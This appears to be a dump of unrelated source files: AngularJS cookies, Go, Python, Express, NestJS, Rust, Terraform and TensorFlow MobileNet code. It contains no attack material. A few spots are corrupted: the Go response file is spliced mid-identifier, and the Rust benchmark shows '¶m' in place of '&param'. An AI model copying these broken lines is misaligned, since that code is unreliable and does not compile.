(function(p,f,n){'use strict';f.module("ngCookies",["ng"]).factory("$cookies",["$rootScope","$browser",function(d,b){var c={},g={},h,k=!1,l=f.copy,m=f.isUndefined;b.addPollFn(function(){var a=b.cookies();h!=a&&(h=a,l(a,g),l(a,c),k&&d.$apply())})();k=!0;d.$watch(function(){var a,e,d;for(a in g)m(c[a])&&b.cookies(a,n);for(a in c)(e=c[a],f.isString(e))?e!==g[a]&&(b.cookies(a,e),d=!0):f.isDefined(g[a])?c[a]=g[a]:delete c[a];if(d)for(a in e=b.cookies(),c)c[a]!==e[a]&&(m(e[a])?delete c[a]:c[a]=e[a])});
return c}]).factory("$cookieStore",["$cookies",function(d){return{get:function(b){return(b=d[b])?f.fromJson(b):b},put:function(b,c){d[b]=f.toJson(c)},remove:function(b){delete d[b]}}}])})(window,window.angular);
//# sourceMappingURL=angular-cookies.min.js.map
model_show_baremetal_server_interface_attachments_response.go | package model
import (
"encoding/json"
"strings"
)
// Response Object
type ShowBaremetalServerInterfaceAttachmentsResponse struct {
	// List of NIC information for the bare metal server. For details, see Table 2, "interfaceAttachments field data structure".
InterfaceAttachments *[]InterfaceAttachments `json:"interfaceAttachments,omitempty"`
HttpStatusCode int `json:"-"`
}
func (o ShowBaremetalServerInterfaceAttachmentsResponse) String() string {
data, err := json.Marshal(o)
if err != nil {
return "ShowBaremetalServerInterfaceAttachmentsRespo | rfaceAttachmentsResponse", string(data)}, " ")
}
init.py | from collections import OrderedDict
from datetime import date
import json
import os
from pathlib import Path
import re
import sys
import pytoml as toml
def get_data_dir():
"""Get the directory path for flit user data files.
"""
home = os.path.realpath(os.path.expanduser('~'))
if sys.platform == 'darwin':
d = Path(home, 'Library')
elif os.name == 'nt':
appdata = os.environ.get('APPDATA', None)
if appdata:
d = Path(appdata)
else:
d = Path(home, 'AppData', 'Roaming')
else:
# Linux, non-OS X Unix, AIX, etc.
xdg = os.environ.get("XDG_DATA_HOME", None)
d = Path(xdg) if xdg else Path(home, '.local/share')
return d / 'flit'
def get_defaults():
try:
with (get_data_dir() / 'init_defaults.json').open(encoding='utf-8') as f:
return json.load(f)
except FileNotFoundError:
return {}
def store_defaults(d):
data_dir = get_data_dir()
try:
data_dir.mkdir(parents=True)
except FileExistsError:
pass
with (data_dir / 'init_defaults.json').open('w', encoding='utf-8') as f:
json.dump(d, f, indent=2)
license_choices = [
('mit', "MIT - simple and permissive"),
('apache', "Apache - explicitly grants patent rights"),
('gpl3', "GPL - ensures that code based on this is shared with the same terms"),
('skip', "Skip - choose a license later"),
]
license_names_to_classifiers = {
'mit': 'License :: OSI Approved :: MIT License',
'gpl3': 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
'apache': 'License :: OSI Approved :: Apache Software License'
}
license_templates_dir = Path(__file__).parent / 'license_templates'
class IniterBase:
def __init__(self, directory='.'):
self.directory = Path(directory)
self.defaults = get_defaults()
def validate_email(self, s):
# Properly validating an email address is much more complex
return bool(re.match(r'.+@.+', s)) or s == ""
def validate_homepage(self, s):
return not s or s.startswith(('http://', 'https://'))
def guess_module_name(self):
packages, modules = [], []
for p in self.directory.iterdir():
if not p.stem.isidentifier():
continue
if p.is_dir() and (p / '__init__.py').is_file():
if p.name not in {'test', 'tests'}:
packages.append(p.name)
elif p.is_file() and p.suffix == '.py':
if p.stem not in {'setup'} and not p.name.startswith('test_'):
modules.append(p.stem)
src_dir = self.directory / 'src'
if src_dir.is_dir():
for p in src_dir.iterdir():
if not p.stem.isidentifier():
continue
if p.is_dir() and (p / '__init__.py').is_file():
if p.name not in {'test', 'tests'}:
packages.append(p.name)
elif p.is_file() and p.suffix == '.py':
if p.stem not in {'setup'} and not p.name.startswith('test_'):
modules.append(p.stem)
if len(packages) == 1:
return packages[0]
elif len(packages) == 0 and len(modules) == 1:
return modules[0]
else:
return None
def update_defaults(self, author, author_email, module, home_page, license):
new_defaults = {'author': author, 'author_email': author_email,
'license': license}
name_chunk_pat = r'\b{}\b'.format(re.escape(module))
if re.search(name_chunk_pat, home_page):
new_defaults['home_page_template'] = \
re.sub(name_chunk_pat, '{modulename}', home_page, flags=re.I)
if any(new_defaults[k] != self.defaults.get(k) for k in new_defaults):
self.defaults.update(new_defaults)
store_defaults(self.defaults)
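    # Illustrative example (hypothetical values): with module='flit' and
    # home_page='https://github.com/takluyver/flit', the stored template is
    # 'https://github.com/takluyver/{modulename}', which seeds the home-page
    # prompt the next time init runs for a new module name.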
def write_license(self, name, author):
if (self.directory / 'LICENSE').exists():
return
year = date.today().year
with (license_templates_dir / name).open(encoding='utf-8') as f:
license_text = f.read()
with (self.directory / 'LICENSE').open('w', encoding='utf-8') as f:
f.write(license_text.format(year=year, author=author))
class TerminalIniter(IniterBase):
def prompt_text(self, prompt, default, validator, retry_msg="Try again."):
if default is not None:
p = "{} [{}]: ".format(prompt, default)
else:
p = prompt + ': '
while True:
response = input(p)
if response == '' and default is not None:
response = default
if validator(response):
return response
print(retry_msg)
def prompt_options(self, prompt, options, default=None):
default_ix = None
print(prompt)
for i, (key, text) in enumerate(options, start=1):
print("{}. {}".format(i, text))
if key == default:
default_ix = i
while True:
p = "Enter 1-" + str(len(options))
if default_ix is not None:
p += ' [{}]'.format(default_ix)
response = input(p+': ')
if (default_ix is not None) and response == '':
return default
if response.isnumeric():
ir = int(response)
if 1 <= ir <= len(options):
return options[ir-1][0]
print("Try again.")
    def initialise(self):
if (self.directory / 'pyproject.toml').exists():
resp = input("pyproject.toml exists - overwrite it? [y/N]: ")
if (not resp) or resp[0].lower() != 'y':
return
module = self.prompt_text('Module name', self.guess_module_name(),
str.isidentifier)
author = self.prompt_text('Author', self.defaults.get('author'),
lambda s: s != '')
author_email = self.prompt_text('Author email',
self.defaults.get('author_email'), self.validate_email)
if 'home_page_template' in self.defaults:
home_page_default = self.defaults['home_page_template'].replace(
'{modulename}', module)
else:
home_page_default = None
home_page = self.prompt_text('Home page', home_page_default, self.validate_homepage,
retry_msg="Should start with http:// or https:// - try again.")
license = self.prompt_options('Choose a license (see http://choosealicense.com/ for more info)',
license_choices, self.defaults.get('license'))
self.update_defaults(author=author, author_email=author_email,
home_page=home_page, module=module, license=license)
metadata = OrderedDict([
('module', module),
('author', author),
])
if author_email:
metadata['author-email'] = author_email
if home_page:
metadata['home-page'] = home_page
if license != 'skip':
metadata['classifiers'] = [license_names_to_classifiers[license]]
self.write_license(license, author)
with (self.directory / 'pyproject.toml').open('w', encoding='utf-8') as f:
f.write(TEMPLATE.format(metadata=toml.dumps(metadata)))
print()
print("Written pyproject.toml; edit that file to add optional extra info.")
TEMPLATE = """\
[build-system]
requires = ["flit_core >=2,<3"]
build-backend = "flit_core.buildapi"
[tool.flit.metadata]
{metadata}
"""
if __name__ == '__main__':
TerminalIniter().initialise()
product.js | const router = require("express").Router();
const { internalServerError } = require("../utils/response");
const ProductControllers = require("../controllers/product");
router.get(
"/all",
async (req, res) => {
try {
await ProductControllers.getAllProducts(req, res);
} catch (error) {
internalServerError(res, error);
}
}
);
router.get(
"/:productName",
async (req, res) => {
try {
await ProductControllers.getProduct(req, res);
} catch (error) {
internalServerError(res, error);
}
}
);
router.put("/",
async (req, res) => {
try {
await ProductControllers.createProduct(req, res);
} catch (error) {
internalServerError(res, error);
}
}
);
router.delete("/:productName",
async (req, res) => {
try {
await ProductControllers.deleteProduct(req, res);
    } catch (error) {
      internalServerError(res, error);
    }
}
);
module.exports = router;
app.module.ts | import { Module } from '@nestjs/common';
import { TasksModule } from './tasks/tasks.module';
@Module({
imports: [TasksModule],
})
export class AppModule { }
raster.rs | // PNG Pong
//
// Copyright © 2019-2021 Jeron Aldaron Lau
//
// Licensed under the Apache License, Version 2.0, <LICENSE-APACHE or
// https://apache.org/licenses/LICENSE-2.0>, or the Zlib License, <LICENSE-ZLIB
// or http://opensource.org/licenses/Zlib>, at your option. This file may not be
// copied, modified, or distributed except according to those terms.
use crate::chunk::{ColorType, ImageHeader};
use pix::{
chan::{Ch16, Ch8},
el::Pixel,
gray::{Gray8, SGray16, SGray8, SGraya16, SGraya8},
rgb::{SRgb16, SRgb8, SRgba16, SRgba8},
Palette, Raster,
};
/// A Raster of one of the PNG types (all are sRGB gamma).
/// PNGs with less than 8 bits per channel are scaled up to 8 bits per channel.
#[allow(missing_debug_implementations)]
pub enum PngRaster {
/// 1, 2, 4, 8-bit greyscale
Gray8(Raster<SGray8>),
/// 16-bit grayscale
Gray16(Raster<SGray16>),
/// 8-bit sRGB
Rgb8(Raster<SRgb8>),
/// 16-bit sRGB
Rgb16(Raster<SRgb16>),
/// 1, 2, 4, 8-bit sRGB(A) palette
Palette(Raster<Gray8>, Box<Palette>, Vec<u8>),
/// 8-bit grayscale with alpha
Graya8(Raster<SGraya8>),
/// 16-bit grayscale with alpha
Graya16(Raster<SGraya16>),
/// 8-bit sRGB with alpha
Rgba8(Raster<SRgba8>),
/// 16-bit sRGB with alpha
Rgba16(Raster<SRgba16>),
}
impl PngRaster {
pub(crate) fn header(&self, interlace: bool) -> ImageHeader {
use PngRaster::*;
match self {
Gray8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Grey,
bit_depth: 8,
interlace,
},
Gray16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Grey,
bit_depth: 16,
interlace,
},
Rgb8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgb,
bit_depth: 8,
interlace,
},
Rgb16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgb,
bit_depth: 16,
interlace,
},
Palette(r, _pal, _pa) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Palette,
bit_depth: 8,
interlace,
},
Graya8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::GreyAlpha,
bit_depth: 8,
interlace,
},
Graya16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::GreyAlpha,
bit_depth: 16,
interlace,
},
Rgba8(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgba,
bit_depth: 8,
interlace,
},
Rgba16(r) => ImageHeader {
width: r.width(),
height: r.height(),
color_type: ColorType::Rgba,
bit_depth: 16,
interlace,
},
}
}
}
impl<P: Pixel> From<PngRaster> for Raster<P>
where
    P::Chan: From<Ch8> + From<Ch16>,
{
    fn from(raster: PngRaster) -> Raster<P> {
use PngRaster::*;
match raster {
Gray8(r) => Raster::with_raster(&r),
Gray16(r) => Raster::with_raster(&r),
Rgb8(r) => Raster::with_raster(&r),
Rgb16(r) => Raster::with_raster(&r),
Palette(raster, pal, pa) => {
let mut pixels = Vec::with_capacity(raster.pixels().len());
for pixel in raster.pixels() {
let i: u8 = pixel.one().into();
let i = i as usize;
let px: SRgb8 = pal.entry(i).unwrap();
let px = SRgba8::new(
px.one(),
px.two(),
px.three(),
Ch8::new(pa[i]),
);
pixels.push(px.convert());
}
Raster::with_pixels(raster.width(), raster.height(), pixels)
}
Graya8(r) => Raster::with_raster(&r),
Graya16(r) => Raster::with_raster(&r),
Rgba8(r) => Raster::with_raster(&r),
Rgba16(r) => Raster::with_raster(&r),
}
}
}
data_source_current_user.go | package ng
import (
"context"
"github.com/harness-io/harness-go-sdk/harness/api"
"github.com/harness-io/harness-go-sdk/harness/nextgen"
"github.com/harness-io/terraform-provider-harness/internal/utils"
"github.com/hashicorp/terraform-plugin-sdk/v2/diag"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
)
func DataSourceCurrentUser() *schema.Resource {
return &schema.Resource{
Description: utils.GetNextgenDescription("Data source for retrieving the current user based on the API key."),
ReadContext: dataSourceCurrentUserRead,
Schema: map[string]*schema.Schema{
"uuid": {
Description: "Unique identifier of the user.",
Type: schema.TypeString,
Computed: true,
},
"name": {
Description: "Name of the user.",
Type: schema.TypeString,
Computed: true,
},
"email": {
Description: "Email address of the user.",
Type: schema.TypeString,
Computed: true,
},
"token": {
Description: "Token used to authenticate the user.",
Type: schema.TypeString,
Computed: true,
},
"default_account_id": {
Description: "Default account ID of the user.",
Type: schema.TypeString,
Computed: true,
},
"intent": {
Description: "Intent of the user.",
Type: schema.TypeString,
Computed: true,
},
"admin": {
Description: "Whether the user is an administrator.",
Type: schema.TypeBool,
Computed: true,
},
"2fa_enabled": {
Description: "Whether 2FA is enabled for the user.",
Type: schema.TypeBool,
Computed: true,
},
"email_verified": {
Description: "Whether the user's email address has been verified.",
Type: schema.TypeBool,
Computed: true,
},
"locked": {
Description: "Whether or not the user account is locked.",
Type: schema.TypeBool,
Computed: true,
},
"signup_action": {
Description: "Signup action of the user.",
Type: schema.TypeString,
Computed: true,
},
"edition": {
Description: "Edition of the platform being used.",
Type: schema.TypeString,
Computed: true,
},
"billing_frequency": {
Description: "Billing frequency of the user.",
Type: schema.TypeString,
Computed: true,
},
},
}
}
func dataSourceCurrentUserRead(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {
c := meta.(*api.Client)
resp, _, err := c.NGClient.UserApi.GetCurrentUserInfo(ctx)
if err != nil {
return diag.Errorf(err.(nextgen.GenericSwaggerError).Error())
}
user := resp.Data
d.SetId(user.Uuid)
d.Set("uuid", user.Uuid)
d.Set("name", user.Name)
d.Set("email", user.Email)
d.Set("token", user.Token)
d.Set("default_account_id", user.DefaultAccountId)
d.Set("intent", user.Intent)
d.Set("admin", user.Admin)
d.Set("2fa_enabled", user.TwoFactorAuthenticationEnabled)
d.Set("email_verified", user.EmailVerified)
d.Set("locked", user.Locked)
d.Set("signup_action", user.SignupAction)
d.Set("edition", user.Edition)
d.Set("billing_frequency", user.BillingFrequency)
return nil
}
__init__.py | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
bench_ssk_ops.rs | use super::ff::Field;
use super::pairing::bls12_381::Fr;
use super::pixel::Pixel;
use super::pixel::PixelSignature;
use super::pixel::SubSecretKey;
use super::rand::Rng;
use super::rand_core::*;
use super::rand_xorshift::XorShiftRng;
use criterion::Criterion;
/// benchmark sub secret key delegation - without randomization
#[allow(dead_code)]
fn bench_ssk_delegate(c: &mut Criterion) {
const SAMPLES: usize = 100;
// this benchmark uses a same set of parameter
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
let param = Pixel::param_gen(&seed, 0).unwrap();
// ssklist at time 1
let mut ssklist: Vec<SubSecretKey> = vec![];
for _i in 0..SAMPLES {
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
// generate a sk and store the first ssk
let (_, sk, _) = Pixel::key_gen(&seed, ¶m).unwrap();
ssklist.push(sk.first_ssk().unwrap());
}
// from root to the leaf we can delegate d - 1 times
for i in 0..param.depth() - 1 {
// clone ssk and param for benchmarking
let ssklist_clone = ssklist.clone();
let param_clone = param.clone();
let message = format!(
"ssk delegate from {} to {}",
ssklist_clone[i].time(),
ssklist_clone[i].time() + 1
);
// benchmark ssk update
c.bench_function(&message, move |b| {
let mut counter = 0;
b.iter(|| {
let mut ssknew = ssklist_clone[counter].clone();
let tar_time = ssknew.time() + 1;
let res = ssknew.delegate(tar_time, param_clone.depth());
assert!(res.is_ok(), res.err());
counter = (counter + 1) % SAMPLES;
})
});
// update ssk to next time stamp
for e in ssklist.iter_mut().take(SAMPLES) {
let tar_time = e.time() + 1;
let res = e.delegate(tar_time, param.depth());
assert!(res.is_ok(), res.err());
}
}
}
/// benchmark sub secret key randomization
#[allow(dead_code)]
fn bench_ssk_leveled_randomization(c: &mut Criterion) {
// this benchmark uses a same set of parameter
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
let param = Pixel::param_gen(&seed, 0).unwrap();
// ssk at time 1
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
// generate a sk and store the first ssk
let (_, sk, _) = Pixel::key_gen(&seed, ¶m).unwrap();
let mut ssk = sk.first_ssk().unwrap();
// from root to the leaf we can delegate d - 1 times
for _ in 0..param.depth() - 1 {
// clone ssk and param for benchmarking
let ssk_clone = ssk.clone();
let param_clone = param.clone();
let message = format!("ssk randomization at time {}", ssk_clone.time(),);
// benchmark ssk randomization
c.bench_function(&message, move |b| {
b.iter(|| {
let mut ssknew = ssk_clone.clone();
let r = Fr::random(&mut XorShiftRng::from_seed([
0x59, 0x62, 0xbe, 0x5d, 0x76, 0x3d, 0x31, 0x8d, 0x17, 0xdb, 0x37, 0x32, 0x54,
0x06, 0xbc, 0xe5,
]));
let res = ssknew.randomization(¶m_clone, r);
assert!(res.is_ok(), res.err());
})
});
// update ssk to next time stamp
let tar_time = ssk.time() + 1;
let res = ssk.delegate(tar_time, param.depth());
assert!(res.is_ok(), res.err());
}
}
/// benchmark sub secret key randomization
#[allow(dead_code)]
fn bench_ssk_leaf_randomization(c: &mut Criterion) {
// this benchmark uses a same set of parameter
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
let param = Pixel::param_gen(&seed, 0).unwrap();
// ssk at time 1
let seed = rand::thread_rng()
.gen_ascii_chars()
.take(32)
.collect::<String>();
// generate a sk and store the first ssk
let (_, sk, _) = Pixel::key_gen(&seed, ¶m).unwrap();
let mut ssk = sk.first_ssk().unwrap();
// update ssk to a leaf node
let tar_time = param.depth() as u64;
let res = ssk.delegate(tar_time, param.depth());
assert!(res.is_ok(), res.err());
// clone ssk and param for benchmarking
let message = format!("ssk randomization at time {}", ssk.time(),);
// benchmark ssk randomization
c.bench_function(&message, move |b| {
b.iter(|| {
//let mut ssknew = ssk_clone.clone();
let r = Fr::random(&mut XorShiftRng::from_seed([
0x59, 0x62, 0xbe, 0x5d, 0x76, 0x3d, 0x31, 0x8d, 0x17, 0xdb, 0x37, 0x32, 0x54, 0x06,
0xbc, 0xe5,
]));
let res = ssk.randomization(¶m, r);
assert!(res.is_ok(), res.err());
})
});
}
criterion_group!(ssk_ops, bench_ssk_leaf_randomization, bench_ssk_delegate);
criterion_group!(ssk_ops_slow, bench_ssk_leveled_randomization);
archive_test.py | import unittest
from datetime import datetime
import archive
class TestArchive(unittest.TestCase):
"""
Various unit tests for wiki.web.archive
Lucas Combs
April 2019
"""
def test_remove_file_extension(self):
"""
Verify that the file extension is removed.
"""
file = "readme.md"
self.assertEqual("readme", archive.remove_file_extension(file))
def test_get_file_extension(self):
"""
Verify that only the file extension is returned.
"""
file = "notes.txt"
self.assertEqual(".txt", archive.get_file_extension(file))
def test_normal_get_page_url_from_path(self):
"""
Verify that the generated URL is correct. The path on disk is different from the wiki URL.
"""
content = "content"
path = "%s\\home.md" % content
self.assertEqual("home", archive.get_page_url_from_path(path, content))
def test_bad_get_page_url_from_path(self):
"""
This is an edge case where the base directory is not present in the path.
In the event that this is not handled, we will have an infinite loop. (Web page will never load)
"""
path = "content\\home.md"
self.assertEqual("content\\home", archive.get_page_url_from_path(path, "INVALID PATH"))
def test_is_archived_page(self):
"""
        Test that a page with an /archive/ directory in its path is considered to be an archived page.
"""
_archive = "archive"
        class MockPage:
            path = "content\\stuff\\%s\\test.md" % _archive
self.assertTrue(archive.is_archived_page(MockPage(), _archive))
def test_get_timestamped_file_name(self):
"""
Verify that a timestamped file name:
1.) Doesn't contain the original file name
* get_timestamped_file_name(readme.md) does not contain "readme"
2.) Has the same file extension
* get_timestamped_file_name(readme.md) ends with ".md"
3.) Contains the current year
* example: 2019
"""
file = "readme"
ext = ".md"
name = archive.get_timestamped_file_name(file + ext)
# Shouldn't contain actual name of file
self.assertFalse(name.__contains__(file))
# Should have the same file extension
self.assertTrue(name.endswith(ext))
# Should contain the year
self.assertTrue(name.__contains__(datetime.now().year.__str__()))
def test_get_file_archive_dir(self):
"""
Verify that a pages archive directory as follows:
Path to *P*: /staff/welcome
Archive path for *P*: /staff/archive/welcome
"""
path = "\\content\\info\\welcome.md"
self.assertEqual("\\content\\info\\%s\\welcome" % archive.ARCHIVE_FOLDER, archive.get_file_archive_dir(path))
if __name__ == '__main__':
    unittest.main()
mobilenet.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Mobilenet Base Class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import copy
import os
import tensorflow as tf
slim = tf.contrib.slim
@slim.add_arg_scope
def apply_activation(x, name=None, activation_fn=None):
return activation_fn(x, name=name) if activation_fn else x
def _fixed_padding(inputs, kernel_size, rate=1):
"""Pads the input along the spatial dimensions independently of input size.
Pads the input such that if it was used in a convolution with 'VALID' padding,
the output would have the same dimensions as if the unpadded input was used
in a convolution with 'SAME' padding.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
kernel_size: The kernel to be used in the conv2d or max_pool2d operation.
rate: An integer, rate for atrous convolution.
Returns:
output: A tensor of size [batch, height_out, width_out, channels] with the
input, either intact (if kernel_size == 1) or padded (if kernel_size > 1).
"""
kernel_size_effective = [kernel_size[0] + (kernel_size[0] - 1) * (rate - 1),
kernel_size[0] + (kernel_size[0] - 1) * (rate - 1)]
pad_total = [kernel_size_effective[0] - 1, kernel_size_effective[1] - 1]
pad_beg = [pad_total[0] // 2, pad_total[1] // 2]
pad_end = [pad_total[0] - pad_beg[0], pad_total[1] - pad_beg[1]]
padded_inputs = tf.pad(inputs, [[0, 0], [pad_beg[0], pad_end[0]],
[pad_beg[1], pad_end[1]], [0, 0]])
return padded_inputs
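# For example, with kernel_size=[3, 3] and rate=1 the effective kernel is 3,
# pad_total is [2, 2], and one row/column of zeros is added on each spatial
# side, so a following 'VALID' convolution matches 'SAME' output dimensions.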
def _make_divisible(v, divisor, min_value=None):
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
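# Illustrative checks with hypothetical values: _make_divisible rounds a scaled
# channel count to the nearest multiple of `divisor`, then bumps the result up
# one step whenever plain rounding would fall more than 10% below the input:
#   _make_divisible(32 * 0.25, 8) == 8    # 8 is already a multiple of 8
#   _make_divisible(95, 64) == 128        # rounding down to 64 loses >10%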
@contextlib.contextmanager
def _set_arg_scope_defaults(defaults):
"""Sets arg scope defaults for all items present in defaults.
Args:
defaults: dictionary/list of pairs, containing a mapping from
function to a dictionary of default args.
Yields:
context manager where all defaults are set.
"""
if hasattr(defaults, 'items'):
items = list(defaults.items())
else:
items = defaults
if not items:
yield
else:
func, default_arg = items[0]
with slim.arg_scope(func, **default_arg):
with _set_arg_scope_defaults(items[1:]):
yield
@slim.add_arg_scope
def depth_multiplier(output_params,
multiplier,
divisible_by=8,
min_depth=8,
**unused_kwargs):
if 'num_outputs' not in output_params:
return
d = output_params['num_outputs']
output_params['num_outputs'] = _make_divisible(d * multiplier, divisible_by,
min_depth)
_Op = collections.namedtuple('Op', ['op', 'params', 'multiplier_func'])
def op(opfunc, **params):
  # Wrap a layer function and its params into an _Op entry for conv_defs.
  return _Op(opfunc, params=params, multiplier_func=depth_multiplier)
class NoOpScope(object):
"""No-op context manager."""
def __enter__(self):
return None
def __exit__(self, exc_type, exc_value, traceback):
return False
def safe_arg_scope(funcs, **kwargs):
"""Returns `slim.arg_scope` with all None arguments removed.
Arguments:
funcs: Functions to pass to `arg_scope`.
**kwargs: Arguments to pass to `arg_scope`.
Returns:
arg_scope or No-op context manager.
Note: can be useful if None value should be interpreted as "do not overwrite
this parameter value".
"""
filtered_args = {name: value for name, value in kwargs.items()
if value is not None}
if filtered_args:
return slim.arg_scope(funcs, **filtered_args)
else:
return NoOpScope()
@slim.add_arg_scope
def mobilenet_base( # pylint: disable=invalid-name
inputs,
conv_defs,
multiplier=1.0,
final_endpoint=None,
output_stride=None,
use_explicit_padding=False,
scope=None,
is_training=False):
"""Mobilenet base network.
Constructs a network from inputs to the given final endpoint. By default
the network is constructed in inference mode. To create network
in training mode use:
with slim.arg_scope(mobilenet.training_scope()):
logits, endpoints = mobilenet_base(...)
Args:
inputs: a tensor of shape [batch_size, height, width, channels].
conv_defs: A list of op(...) layers specifying the net architecture.
multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
    final_endpoint: The name of the last layer, for early termination. For
      V1-based networks the last layer is "layer_14"; for V2 it is "layer_20".
output_stride: An integer that specifies the requested ratio of input to
output spatial resolution. If not None, then we invoke atrous convolution
if necessary to prevent the network from reducing the spatial resolution
of the activation maps. Allowed values are 1 or any even number, excluding
zero. Typical values are 8 (accurate fully convolutional mode), 16
(fast fully convolutional mode), and 32 (classification mode).
      NOTE: output_stride relies on all subsequent operators supporting
      dilation via the "rate" parameter. This might require wrapping non-conv
      operators to operate properly.
use_explicit_padding: Use 'VALID' padding for convolutions, but prepad
inputs so that the output dimensions are the same as if 'SAME' padding
were used.
scope: optional variable scope.
    is_training: How to set up batch_norm and other ops. Note: most of the
      time this does not need to be set directly. Use
      mobilenet.training_scope() to set up training instead. This parameter
      is here for backward compatibility
only. It is safe to set it to the value matching
training_scope(is_training=...). It is also safe to explicitly set
      it to False, even if there is an outer training_scope set to training.
(The network will be built in inference mode). If this is set to None,
no arg_scope is added for slim.batch_norm's is_training parameter.
Returns:
tensor_out: output tensor.
end_points: a set of activations for external use, for example summaries or
losses.
Raises:
    ValueError: multiplier <= 0, or the target output_stride is not
allowed.
"""
if multiplier <= 0:
raise ValueError('multiplier is not greater than zero.')
# Set conv defs defaults and overrides.
conv_defs_defaults = conv_defs.get('defaults', {})
conv_defs_overrides = conv_defs.get('overrides', {})
if use_explicit_padding:
conv_defs_overrides = copy.deepcopy(conv_defs_overrides)
conv_defs_overrides[
(slim.conv2d, slim.separable_conv2d)] = {'padding': 'VALID'}
if output_stride is not None:
if output_stride == 0 or (output_stride > 1 and output_stride % 2):
raise ValueError('Output stride must be None, 1 or a multiple of 2.')
# a) Set the tensorflow scope
# b) set padding to default: note we might consider removing this
# since it is also set by mobilenet_scope
# c) set all defaults
# d) set all extra overrides.
with _scope_all(scope, default_scope='Mobilenet'), \
safe_arg_scope([slim.batch_norm], is_training=is_training), \
_set_arg_scope_defaults(conv_defs_defaults), \
_set_arg_scope_defaults(conv_defs_overrides):
# The current_stride variable keeps track of the output stride of the
# activations, i.e., the running product of convolution strides up to the
# current network layer. This allows us to invoke atrous convolution
# whenever applying the next convolution would result in the activations
# having output stride larger than the target output_stride.
current_stride = 1
# The atrous convolution rate parameter.
rate = 1
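    # Illustrative trace (assumed strides): with output_stride=8 and layer
    # strides [2, 2, 2, 2], the first three layers run normally
    # (current_stride: 2 -> 4 -> 8); the fourth is forced to stride 1, and
    # the atrous rate accumulated from its skipped stride (2) dilates the
    # layers that follow.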
net = inputs
# Insert default parameters before the base scope which includes
# any custom overrides set in mobilenet.
end_points = {}
scopes = {}
for i, opdef in enumerate(conv_defs['spec']):
params = dict(opdef.params)
opdef.multiplier_func(params, multiplier)
stride = params.get('stride', 1)
if output_stride is not None and current_stride == output_stride:
# If we have reached the target output_stride, then we need to employ
# atrous convolution with stride=1 and multiply the atrous rate by the
# current unit's stride for use in subsequent layers.
layer_stride = 1
layer_rate = rate
rate *= stride
else:
layer_stride = stride
layer_rate = 1
current_stride *= stride
# Update params.
params['stride'] = layer_stride
# Only insert rate to params if rate > 1.
if layer_rate > 1:
params['rate'] = layer_rate
# Set padding
if use_explicit_padding:
if 'kernel_size' in params:
net = _fixed_padding(net, params['kernel_size'], layer_rate)
else:
params['use_explicit_padding'] = True
end_point = 'layer_%d' % (i + 1)
try:
net = opdef.op(net, **params)
except Exception:
print('Failed to create op %i: %r params: %r' % (i, opdef, params))
raise
end_points[end_point] = net
scope = os.path.dirname(net.name)
scopes[scope] = end_point
if final_endpoint is not None and end_point == final_endpoint:
break
    # Add all tensors that end with 'output' to end_points.
for t in net.graph.get_operations():
scope = os.path.dirname(t.name)
bn = os.path.basename(t.name)
if scope in scopes and t.name.endswith('output'):
end_points[scopes[scope] + '/' + bn] = t.outputs[0]
return net, end_points
@contextlib.contextmanager
def _scope_all(scope, default_scope=None):
with tf.variable_scope(scope, default_name=default_scope) as s,\
tf.name_scope(s.original_name_scope):
yield s
@slim.add_arg_scope
def mobilenet(inputs,
num_classes=1001,
prediction_fn=slim.softmax,
reuse=None,
scope='Mobilenet',
base_only=False,
**mobilenet_args):
"""Mobilenet model for classification, supports both V1 and V2.
  Note: default mode is inference; use mobilenet.training_scope to create a
  training network.
Args:
inputs: a tensor of shape [batch_size, height, width, channels].
num_classes: number of predicted classes. If 0 or None, the logits layer
is omitted and the input features to the logits layer (before dropout)
are returned instead.
prediction_fn: a function to get predictions out of logits
(default softmax).
    reuse: whether or not the network and its variables should be reused. To
      be able to reuse, 'scope' must be given.
scope: Optional variable_scope.
base_only: if True will only create the base of the network (no pooling
and no logits).
**mobilenet_args: passed to mobilenet_base verbatim.
- conv_defs: list of conv defs
- multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
    - output_stride: will ensure that the last layer has at most this total stride.
If the architecture calls for more stride than that provided
(e.g. output_stride=16, but the architecture has 5 stride=2 operators),
it will replace output_stride with fractional convolutions using Atrous
Convolutions.
Returns:
logits: the pre-softmax activations, a tensor of size
[batch_size, num_classes]
end_points: a dictionary from components of the network to the corresponding
activation tensor.
Raises:
